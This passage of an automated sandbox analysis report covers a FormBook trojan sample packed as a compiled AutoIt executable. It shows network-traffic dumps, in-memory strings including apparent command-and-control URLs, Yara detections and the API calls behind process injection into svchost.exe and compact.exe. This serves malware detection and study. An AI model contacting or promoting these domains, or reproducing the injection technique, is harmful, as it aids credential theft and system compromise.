20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 29 Aug 2024 10:25:46 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 29 Aug 2024 10:25:50 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: eypfpUNFpbLX.exe, 00000009.00000002.4026387029.0000000004FE7000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.030002721.xyz
Source: eypfpUNFpbLX.exe, 00000009.00000002.4026387029.0000000004FE7000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.030002721.xyz/jpse/
Source: compact.exe, 00000007.00000002.4026214953.0000000003F4E000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.000000000370E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.fimgroup.net:80/m3ft/?cLStcv3=mm8fgD9
Source: eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000003A32000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yhqapp.com/?39988
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: compact.exe, 00000007.00000002.4015509843.0000000000745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oau
Source: compact.exe, 00000007.00000002.4015509843.0000000000745000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2644562569.000000000074B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: compact.exe, 00000007.00000003.2643680914.00000000075BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: compact.exe, 00000007.00000002.4015509843.0000000000719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: compact.exe, 00000007.00000002.4026214953.0000000003C2A000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000007.00000002.4028193261.0000000005B90000.00000004.00000800.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.00000000033EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: compact.exe, 00000007.00000003.2648114236.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: compact.exe, 00000007.00000002.4026214953.0000000003DBC000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.000000000357C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.kiristyle.shop/m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C0EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C0EAFF

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C0ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00C0ED6A

Source: C:\Users\user\Desktop\bintoday1.exe

0_2_00C0EAFF

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BFAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_00BFAA57

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C29576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00C29576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: bintoday1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: bintoday1.exe, 00000000.00000000.2163703264.0000000000C52000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_087713b8-f
Source: bintoday1.exe, 00000000.00000000.2163703264.0000000000C52000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4ba7caf1-4
Source: bintoday1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8b985d2f-9
Source: bintoday1.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8c88017a-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0049C8E3 NtClose,	2_2_0049C8E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0047190C NtProtectVirtualMemory,	2_2_0047190C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B60 NtClose,LdrInitializeThunk,	2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,	2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074340 NtSetContextThread,	2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074650 NtSuspendThread,	2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B80 NtQueryInformationFile,	2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BA0 NtEnumerateValueKey,	2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BE0 NtQueryValueKey,	2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BF0 NtAllocateVirtualMemory,	2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AB0 NtWaitForSingleObject,	2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AD0 NtReadFile,	2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AF0 NtWriteFile,	2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F30 NtCreateSection,	2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F60 NtCreateProcessEx,	2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F90 NtProtectVirtualMemory,	2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FA0 NtQuerySection,	2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FB0 NtResumeThread,	2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FE0 NtCreateFile,	2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E30 NtWriteVirtualMemory,	2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E80 NtReadVirtualMemory,	2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EA0 NtAdjustPrivilegesToken,	2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EE0 NtQueueApcThread,	2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D00 NtSetInformationFile,	2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D10 NtMapViewOfSection,	2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D30 NtUnmapViewOfSection,	2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DB0 NtEnumerateKey,	2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DD0 NtDelayExecution,	2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C00 NtQueryInformationProcess,	2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C60 NtCreateKey,	2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C70 NtFreeVirtualMemory,	2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CA0 NtQueryInformationToken,	2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CC0 NtQueryVirtualMemory,	2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CF0 NtOpenProcess,	2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073010 NtOpenDirectoryObject,	2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073090 NtSetValueKey,	2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030739B0 NtGetContextThread,	2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D10 NtOpenProcessToken,	2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D70 NtOpenThread,	2_2_03073D70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD4340 NtSetContextThread,LdrInitializeThunk,	7_2_02DD4340
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD4650 NtSuspendThread,LdrInitializeThunk,	7_2_02DD4650
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2AD0 NtReadFile,LdrInitializeThunk,	7_2_02DD2AD0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2AF0 NtWriteFile,LdrInitializeThunk,	7_2_02DD2AF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_02DD2BF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_02DD2BE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_02DD2BA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2B60 NtClose,LdrInitializeThunk,	7_2_02DD2B60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_02DD2EE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_02DD2E80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2FE0 NtCreateFile,LdrInitializeThunk,	7_2_02DD2FE0
